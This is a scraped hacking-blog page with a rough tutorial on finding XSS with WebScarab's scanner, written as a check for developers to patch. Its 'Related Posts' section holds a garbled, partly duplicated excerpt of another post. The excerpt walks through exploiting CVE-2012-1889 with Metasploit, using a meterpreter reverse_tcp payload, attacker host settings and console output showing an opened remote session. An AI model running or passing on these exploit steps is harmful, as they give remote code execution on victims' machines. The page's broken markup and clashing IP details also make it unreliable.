Today in this tutorial we will discuss about the xss attack using the WebScarab , I’ll introduce to you first with the
(XSS) Cross-Site Scripting is
a type of computer security vulnerability typically found in Web
applications (such as web browsers through breaches of browser security)
that enables attackers to inject client-side script into Web
pages viewed by other users. A cross-site scripting vulnerability may be
used by attackers to bypass access controls such as the same origin
policy.
Now I’ll tell you how can we check the
XSS Vulnerability in the
www.xyz.com website.
First-off-all you have to configure the proxy(localhost with port
8008) in the browser and after that open the website in the browser ,
just after that u can see the fallowing result in WebScarab as shown in
fig:
To check out the XSS vulnerability , just click on XSS/CRLF tab and see the result as in fig:
After checking out this result, click on the
Edit Text Strings and
it will show the script that we have to inject and you have to click on
ok and after that click on check and you get the fallowing result as
shown in fig:
and after that click on check and you get the fallowing result as shown in fig:
Again click on the
Summary tab as shown :
And double click on arrow given in the above fig and
In the above fig the XML code is given of that particular page and
particular location , where the XSS attack is working here you can find
out the vulnerability and change your coding according to the attack it
showing.
This is the actual line of coding where the XSS Attack is working in
the below image the text format is also given , and from here you can
change your coding and patch the vulnerability………
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="https://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information. 
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon